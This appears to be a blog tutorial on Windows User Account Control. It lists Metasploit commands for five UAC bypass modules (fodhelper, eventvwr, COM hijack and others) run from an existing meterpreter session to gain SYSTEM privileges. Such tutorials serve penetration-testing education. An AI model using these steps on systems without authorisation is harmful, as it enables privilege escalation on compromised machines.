Hello friends!! Today we are shading light on User Account Control shortly known as
UAC. We will also look how it can potentially protect you from malicious
software and ignoring UAC prompt can trouble your system.
Table of content
Introduction to UAC
What is UAC?
Working of UAC
5 ways to Bypass UAC
1.
Windows Escalate UAC Protection Bypass
2.
Windows Escalate UAC Protection Bypass (In
Memory Injection)
3.
Windows UAC Protection Bypass (Via FodHelper
Registry Key)
4.
Windows Escalate UAC Protection Bypass (Via
Eventvwr Registry Key)
5.
Windows Escalate UAC Protection Bypass (Via COM
Handler Hijack)
Introduction to User Account Control
What is User
Account Control?
A well-structured User Account Control introduced with
Microsoft's Windows Vista and Windows Server 2008 operating systems to prevent
unwanted system-wide changes in a way that is foreseen and requires minimal
effort.
In other words it is a security feature of Windows which supports
I preventing unauthorized modifications to the operating system UAC makes sure that
the certain changes are made only with authorization from the administrator. If
the changes are not permitted by the administrator, they are not executed, and
Windows remains unchanged.
How does UAC work?
UAC works by preventing a program from carrying out any
tasks which involve system changes/specific tasks. The operations which will
not work unless the process attempting to carry them out is running with
administrator rights. If you run a program as administrator, it will have more
privileges since it would be "elevated", compared to the programs
running which are not running as administrator.
Some things which cannot be done without administrator
rights:
§
Registry modifications (if the registry key is
under e.g. HKEY_LOCAL_MACHINE (since it affects more than one user) it will be
read-only)
§
Loading a device driver
§
DLL injection
§
Modifying system time (clock)
§
Modifying User Account Control settings (via
Registry, it can be enabled/disabled but you need the correct privileges to do
this)
§
Modify protected directories (e.g. Windows
folder, Program Files)
§
Scheduled tasks (e.g. to auto-start with
administrator privileges)
UAC won't just
automatically block malicious software, the purpose wasn't to determine if a
program is malicious or not. It's down to the user just as much. If a program
is going to be executed with administrator privileges, the user will be alerted
and will need to provide confirmation.
5 Ways to Bypass UAC
Firstly exploit the target machine to obtain the
meterpreter. Once you get the meterpreter session 1 then type following command
to check system authority and privileges.
getsystem
getuid
If you don’t have system/admin authorities and
privileges. Then you should go for bypass UAC Protection of targeted system.
Windows
Escalate UAC Protection Bypass
This module will bypass Windows UAC by utilizing the
trusted publisher certificate through process injection. It will spawn a second
shell that has the UAC flag turned off.
msf > use
exploit/windows/local/bypassuac
msf exploit windows/local/bypassuac)
> set session 1
msf exploit(windows/local/bypassuac)
> exploit
From given image you can observe that meterpreter session 2 opened,
now type the following command to determine the system authority privileges.
getsystem
getuid
Great!! Here we got NT AUTHORITY\SYSTEM
Privilege, now if you will type “shell”
command, you will get access of command prompt with administrator privilege.
Windows
Escalate UAC Protection Bypass (In Memory Injection)
This module will bypass Windows UAC by utilizing the
trusted publisher certificate through process injection. It will spawn a second
shell that has the UAC flag turned off. This module uses the Reflective DLL
Injection technique to drop only the DLL payload binary instead of three
separate binaries in the standard technique. However, it requires the correct
architecture to be selected, (use x64 for SYSWOW64 systems also). If specifying
EXE::Custom your DLL should call ExitProcess() after starting your payload in a
separate process.
msf > use
exploit/windows/local/bypassuac_injection
msf
exploit(windows/local/bypassuac_injection) > set session 1
msf
exploit(windows/local/bypassuac_injection) > exploit
From given image you can observe that meterpreter session 2 opened,
now type the following command to determine the system authority privileges.
getsystem
getuid
Ultimately you
will get NT AUTHORITY\SYSTEM Privilege, now if you will run “shell” command, you will get access of
command prompt with administrator privilege.
Windows UAC Protection Bypass (Via
FodHelper Registry Key)
This module will bypass Windows 10 UAC by hijacking a
special key in the Registry under the current user hive, and inserting a custom
command that will get invoked when the Windows fodhelper.exe application is
launched. It will spawn a second shell that has the UAC flag turned off. This
module modifies a registry key, but cleans up the key once the payload has been
invoked. The module does not require the architecture of the payload to match
the OS. If specifying EXE::Custom your DLL should call ExitProcess() after
starting your payload in a separate process.
msf > use exploit/windows/local/bypassuac_fodhelper
msf exploit(windows/local/bypassuac_fodhelper) > set session
1
msf exploit(windows/local/bypassuac_fodhelper) >
exploit
From given image you can observe that meterpreter session 2 opened,
now type the following command to determine the system authority privileges.
getsystem
getprivs
Great!! Here we got NT AUTHORITY\SYSTEM
Privilege, now if you will type “shell”
command, you will get access of command
prompt with administrator privilege.
Windows Escalate UAC Protection Bypass
(Via Eventvwr Registry Key)
This module will bypass Windows UAC by hijacking a
special key in the Registry under the current user hive, and inserting a custom
command that will get invoked when the Windows Event Viewer is launched. It
will spawn a second shell that has the UAC flag turned off. This module
modifies a registry key, but cleans up the key once the payload has been
invoked. The module does not require the architecture of the payload to match
the OS. If specifying EXE::Custom your DLL should call ExitProcess() after
starting your payload in a separate process.
msf > use exploit/windows/local/bypassuac_eventvwr
msf exploit(windows/local/bypassuac_eventvwr) >
set session 1
msf exploit(windows/local/bypassuac_eventvwr) >
exploit
From given image you can observe that meterpreter session 2 opened,
now type the following command to determine the system authority privileges.
getsystem
getuid
And again you
will get NT AUTHORITY\SYSTEM Privilege.
Windows Escalate UAC Protection Bypass
(Via COM Handler Hijack)
This module will bypass Windows UAC by creating COM
handler registry entries in the HKCU hive. When certain high integrity
processes are loaded, these registry entries are referenced resulting in the
process loading user-controlled DLLs. These DLLs contain the payloads that
result in elevated sessions. Registry key modifications are cleaned up after
payload invocation. This module requires the architecture of the payload to
match the OS, but the current low-privilege Meterpreter session architecture
can be different. If specifying EXE::Custom your DLL should call ExitProcess()
after starting your payload in a separate process. This module invokes the
target binary via cmd.exe on the target. Therefore if cmd.exe access is
restricted, this module will not run correctly.
msf > use exploit/windows/local/bypassuac_comhijack
msf exploit(windows/local/bypassuac_comhijack) > set
session 1
msf exploit(windows/local/bypassuac_comhijack) >
exploit
From given image you can observe that meterpreter session 2 opened,
now type the following command to determine the system authority privileges.
getsystem
getuid
Finally you will get
NT AUTHORITY\SYSTEM Privilege, now if you will again run “shell” command then you will get access of command prompt with
administrator privilege and this way we can help of Metasploit post exploit to
bypass UAC protection.
0 comments:
Post a Comment